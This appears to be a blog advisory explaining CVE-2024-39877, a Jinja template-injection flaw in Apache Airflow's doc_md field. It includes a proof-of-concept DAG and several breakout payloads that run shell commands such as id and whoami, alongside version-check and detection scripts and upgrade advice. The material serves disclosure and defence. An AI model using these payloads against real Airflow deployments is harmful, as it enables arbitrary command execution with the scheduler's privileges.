Apache Airflow is a popular platform for programmatically authoring, scheduling, and monitoring workflows. Like any software, it occasionally ships with unintended security holes, and CVE-2024-39877, which affects releases before Apache Airflow 2.9.3, is one of them.

This post breaks down what CVE-2024-39877 is and how authenticated users can exploit it, walks through a simplified code example, and shares resources for digging deeper.

What is CVE-2024-39877?

CVE-2024-39877 is a security vulnerability in Apache Airflow (from 2.4.0 up to, but not including, 2.9.3) where authenticated DAG authors can misuse the DAG’s doc_md field to execute arbitrary Python code in the scheduler's context.

The Airflow security model does not allow DAG authors to execute arbitrary code in the scheduler's context, which is what makes this behavior a vulnerability:

- doc_md is a documentation field—used to display markdown info about a DAG. It's not supposed to let you run code at all.
- However, before version 2.9.3, this field was mishandled in a way that let people break out of markdown and run Python in the scheduler process.

How Does the Exploit Work?

Airflow uses Jinja templating for parts of its UI and documentation rendering. If a user with DAG author permissions puts a Jinja expression in a DAG's doc_md field (which is intended for markdown), vulnerable versions render it as a template in the scheduler's Python context. The expression can be a probe such as {{ macros.__dict__ }} or something more dangerous such as {{ cycler.__init__.__globals__.os.popen('id').read() }}. The latter is known as a "Jinja breakout": it walks Python object attributes until it reaches the os module, at which point it can execute arbitrary code.
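To see why a chain like cycler.__init__.__globals__.os leads anywhere, it helps to try the same attribute walk in plain Python. The following is a minimal sketch, not Airflow or Jinja code: the Cycler class is a hypothetical stand-in for the helper that Jinja exposes to templates, and a harmless os.getcwd() call stands in for the shell command.

```python
import os  # imported at module level, so it lands in this module's globals


class Cycler:
    """Hypothetical stand-in for a harmless helper class exposed to templates."""

    def __init__(self, *items):
        self.items = items


# Every Python function keeps a reference to the globals of the module that
# defined it, and a class's __init__ is an ordinary function in that respect.
module_globals = Cycler.__init__.__globals__

# The defining module imported `os`, so the chain reaches it without the
# caller ever writing an import statement.
reached_os = module_globals["os"]

# A benign call stands in for the command an attacker would run.
print(reached_os.getcwd())
```

Nothing in the chain looks dangerous on its own, which is why this kind of underscore-prefixed attribute access is what a sandboxed template environment is designed to refuse.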

---
Important: This means anyone who can upload or edit DAG files could run code as the Airflow scheduler user, with the scheduler's privileges rather than only those the security model grants to DAG authors.
---

Imagine a malicious (but authenticated) DAG author who can drop a .py DAG file into Airflow:

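from datetime import datetime

from airflow import DAG
from airflow.operators.empty import EmptyOperator  # replaces the deprecated DummyOperator

# Proof of concept for affected versions only (2.4.0 up to, not including, 2.9.3).
dag = DAG(
    dag_id='evil_dag',
    start_date=datetime(2023, 1, 1),
    schedule=None,  # `schedule` supersedes the deprecated `schedule_interval` since 2.4
    # doc_md should hold markdown; here it carries a Jinja expression instead.
    doc_md="""
{{ cycler.__init__.__globals__.os.popen('id').read() }}
""",
)

# A placeholder task so the DAG is otherwise valid.
task = EmptyOperator(
    task_id='do_nothing',
    dag=dag,
)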

If this DAG is loaded and the vulnerable Airflow scheduler parses doc_md, the Jinja template is rendered, breaks out through Python's object introspection, and runs the id command on the server. The command's output would be viewable in the rendered markdown for the DAG, and id could be swapped for any other command.

A working example of such a template exploit might look like:

{{ cycler.__init__.__globals__.os.system('touch /tmp/pwned_by_doc_md') }}

or

{{ cycler.__init__.__globals__.os.popen('whoami').read() }}

When the Airflow scheduler loads this field, it’ll run the shell command with the scheduler's permissions.

Who Is Affected?

- All Apache Airflow setups running 2.4.0 up to (but not including) 2.9.3.
- The attacker MUST have permissions to author, upload, or modify DAG files. This isn’t a fully remote exploit, but it does break Airflow’s promise of isolation between DAG code and the scheduler.
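The affected range can be turned into a quick check. This is a minimal sketch under stated assumptions: the function names and constants are hypothetical and not part of Airflow, and pre-release suffixes such as rc1 are ignored, so a 2.9.3 release candidate is treated like 2.9.3 itself.

```python
from __future__ import annotations

import re

AFFECTED_FROM = (2, 4, 0)  # first affected release, as stated above
FIXED_IN = (2, 9, 3)       # first release that contains the fix


def parse_version(version: str) -> tuple[int, int, int]:
    """Extract the leading MAJOR.MINOR[.PATCH] numbers from a version string."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    # A missing patch component is treated as 0.
    major, minor, patch = match.groups(default="0")
    return int(major), int(minor), int(patch)


def is_affected(version: str) -> bool:
    """Return True if the version lies in the affected range [2.4.0, 2.9.3)."""
    return AFFECTED_FROM <= parse_version(version) < FIXED_IN


for candidate in ("2.3.4", "2.4.0", "2.9.2", "2.9.3", "2.10.0"):
    print(candidate, is_affected(candidate))
```

In a real environment you would pass in the installed version, for example the value of airflow.__version__. Comparing tuples of integers avoids the string-comparison trap where "2.10.0" sorts before "2.9.3".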

How to Fix It

Upgrade ASAP to 2.9.3 or later:

Apache Airflow Releases

Check your access controls:

Make sure that only trusted people can upload or modify DAG files.
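Alongside tightening access, it can be useful to audit the DAG files you already have. The sketch below is one possible heuristic, not an official tool: the function name is hypothetical, it only inspects string literals passed as a doc_md keyword argument, and it will miss values built at runtime while also flagging harmless documentation that happens to contain Jinja delimiters.

```python
from __future__ import annotations

import ast

JINJA_MARKERS = ("{{", "{%")  # opening delimiters of Jinja expressions and statements


def find_templated_doc_md(source: str) -> list[int]:
    """Return line numbers of literal doc_md= arguments containing Jinja delimiters."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for keyword in node.keywords:
            value = keyword.value
            if (
                keyword.arg == "doc_md"
                and isinstance(value, ast.Constant)
                and isinstance(value.value, str)
                and any(marker in value.value for marker in JINJA_MARKERS)
            ):
                hits.append(value.lineno)
    return sorted(hits)


# The source is only parsed, never imported or executed.
sample = '''
dag = DAG(
    dag_id="example",
    doc_md="{{ 1 + 1 }}",
)
'''
print(find_templated_doc_md(sample))
```

Using the ast module rather than importing the DAG file means a suspicious file is never run during the audit. Any hit is a prompt for manual review rather than proof of an attack.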

Official References & More Reading

- CVE-2024-39877 on NIST NVD
- Apache Airflow GitHub Security Advisory (GHSA-px9c-53hh-fp2r)
- Upgrade Guide for Airflow
- Original Fix Pull Request

Final Thoughts

CVE-2024-39877 highlights how small oversights in template handling and user input fields can open the door to major security risks, even when the only people who can reach those fields are authenticated users. If you’re using Apache Airflow, stop and check your version, then upgrade if needed.

Stay safe, keep dependencies up to date, and always be careful with user-provided templates in any system!



Timeline

Published on: 07/17/2024 08:15:02 UTC
Last modified on: 08/01/2024 13:56:00 UTC